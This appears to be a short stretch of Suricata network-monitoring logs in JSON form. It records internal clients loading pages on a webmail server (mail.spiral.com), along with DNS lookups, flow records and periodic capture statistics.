{"timestamp":"2020-02-29T00:09:14.001244+0000","flow_id":1596077147384852,"event_type":"flow","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1237,"bytes_toclient":6071,"start":"2020-02-29T00:08:07.945172+0000","end":"2020-02-29T00:08:13.158534+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:15.521386+0000","flow_id":127932775662908,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52710,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":410},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} {"timestamp":"2020-02-29T00:09:17.000561+0000","flow_id":422558938389413,"event_type":"flow","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1227,"bytes_toclient":1755,"start":"2020-02-29T00:08:11.088997+0000","end":"2020-02-29T00:08:16.285131+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:17.822586+0000","flow_id":2001607963729589,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34778,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3336},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:09:18.001282+0000","flow_id":1214726986095481,"event_type":"flow","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:17.809849+0000","end":"2020-02-29T00:04:17.921212+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:21.000257+0000","event_type":"stats","stats":{"uptime":14213,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2325,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":1937,"memcap":0}}} {"timestamp":"2020-02-29T00:09:23.000410+0000","flow_id":1027835779501480,"event_type":"flow","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.216488+0000","end":"2020-02-29T00:04:22.321659+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.000231+0000","flow_id":1696278719705921,"event_type":"flow","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.537409+0000","end":"2020-02-29T00:04:23.642729+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001086+0000","flow_id":871752373023523,"event_type":"flow","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:22.963363+0000","end":"2020-02-29T00:04:23.068671+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:24.001803+0000","flow_id":1497310064742804,"event_type":"flow","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:04:23.725396+0000","end":"2020-02-29T00:04:23.830890+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.000361+0000","flow_id":1446393227616656,"event_type":"flow","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:25.434576+0000","end":"2020-02-29T00:04:25.539965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:26.001140+0000","flow_id":533480764378464,"event_type":"flow","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1062,"start":"2020-02-29T00:08:20.363872+0000","end":"2020-02-29T00:08:25.580042+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:27.000298+0000","flow_id":2004988097150431,"event_type":"flow","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2119,"bytes_toclient":16868,"start":"2020-02-29T00:07:43.802271+0000","end":"2020-02-29T00:08:26.308021+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:28.000219+0000","event_type":"stats","stats":{"uptime":14220,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2712,"new_pruned":15,"est_pruned":2329,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} {"timestamp":"2020-02-29T00:09:28.001781+0000","flow_id":2038445879581300,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:04:27.449140+0000","end":"2020-02-29T00:04:27.609675+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:30.000677+0000","flow_id":1612243390009016,"event_type":"flow","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:29.495288+0000","end":"2020-02-29T00:04:29.600386+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000442+0000","flow_id":1188136844541723,"event_type":"flow","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.278299+0000","end":"2020-02-29T00:04:32.386792+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:33.000771+0000","flow_id":1403928886416178,"event_type":"flow","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:32.103218+0000","end":"2020-02-29T00:04:32.211965+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:35.000237+0000","event_type":"stats","stats":{"uptime":14227,"capture":{"kernel_packets":134227,"kernel_drops":0},"decoder":{"pkts":134227,"bytes":92710169,"invalid":185,"ipv4":132756,"ipv6":8,"ethernet":134227,"raw":0,"null":0,"sll":0,"tcp":127572,"udp":4984,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2731,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2747,"synack":2738,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2274,"failed_udp":110},"tx":{"http":4570,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2353}},"flow_mgr":{"closed_pruned":2714,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":1,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":1777,"memcap":0}}} {"timestamp":"2020-02-29T00:09:40.005609+0000","flow_id":1506149123404467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":1233,"bytes_toclient":9789,"start":"2020-02-29T00:08:26.307891+0000","end":"2020-02-29T00:08:38.282721+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:40.919718+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:41.000832+0000","flow_id":384277881088369,"event_type":"flow","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:40.321905+0000","end":"2020-02-29T00:04:40.431524+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:41.001029+0000","flow_id":2230598437064297,"event_type":"flow","src_ip":"192.168.10.130","src_port":34770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":820,"start":"2020-02-29T00:08:26.872041+0000","end":"2020-02-29T00:08:27.455695+0000","age":1,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:41.028314+0000","flow_id":653855817992358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49092,"proto":"UDP","dns":{"type":"answer","id":64267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:41.226094+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978}} {"timestamp":"2020-02-29T00:09:42.000194+0000","event_type":"stats","stats":{"uptime":14234,"capture":{"kernel_packets":134231,"kernel_drops":0},"decoder":{"pkts":134235,"bytes":92711293,"invalid":185,"ipv4":132764,"ipv6":8,"ethernet":134235,"raw":0,"null":0,"sll":0,"tcp":127579,"udp":4985,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2732,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2748,"synack":2739,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1772,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2275,"failed_udp":110},"tx":{"http":4571,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2354}},"flow_mgr":{"closed_pruned":2715,"new_pruned":15,"est_pruned":2334,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17193,"memcap_state":0,"memcap_global":0},"http":{"memuse":87370,"memcap":0}}} {"timestamp":"2020-02-29T00:09:44.645754+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49461,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:44.754265+0000","flow_id":1943479878474362,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41241,"proto":"UDP","dns":{"type":"answer","id":49461,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:44.893739+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:09:46.232090+0000","flow_id":1979596258201268,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34780,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6978},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37764,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.000241+0000","event_type":"stats","stats":{"uptime":14241,"capture":{"kernel_packets":134266,"kernel_drops":0},"decoder":{"pkts":134270,"bytes":92729762,"invalid":185,"ipv4":132795,"ipv6":8,"ethernet":134270,"raw":0,"null":0,"sll":0,"tcp":127607,"udp":4988,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2733,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2749,"synack":2740,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1774,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2276,"failed_udp":110},"tx":{"http":4572,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2355}},"flow_mgr":{"closed_pruned":2716,"new_pruned":15,"est_pruned":2335,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17523,"memcap_state":0,"memcap_global":0},"http":{"memuse":156103,"memcap":0}}} {"timestamp":"2020-02-29T00:09:49.081618+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43730,"tx_id":0}} {"timestamp":"2020-02-29T00:09:49.091380+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5327,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:49.199155+0000","flow_id":1254571419460852,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45436,"proto":"UDP","dns":{"type":"answer","id":5327,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:49.265090+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52712,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367}} {"timestamp":"2020-02-29T00:09:51.000277+0000","flow_id":1140587262819103,"event_type":"flow","src_ip":"192.168.10.122","src_port":54066,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:04:50.047903+0000","end":"2020-02-29T00:04:50.157141+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:09:52.533076+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33863,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:09:52.641396+0000","flow_id":280640340632148,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52733,"proto":"UDP","dns":{"type":"answer","id":33863,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:09:52.717546+0000","flow_id":1083094850400979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34782,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:09:54.266549+0000","flow_id":1388849276691051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52712,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5367},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":27082,"tx_id":1}} 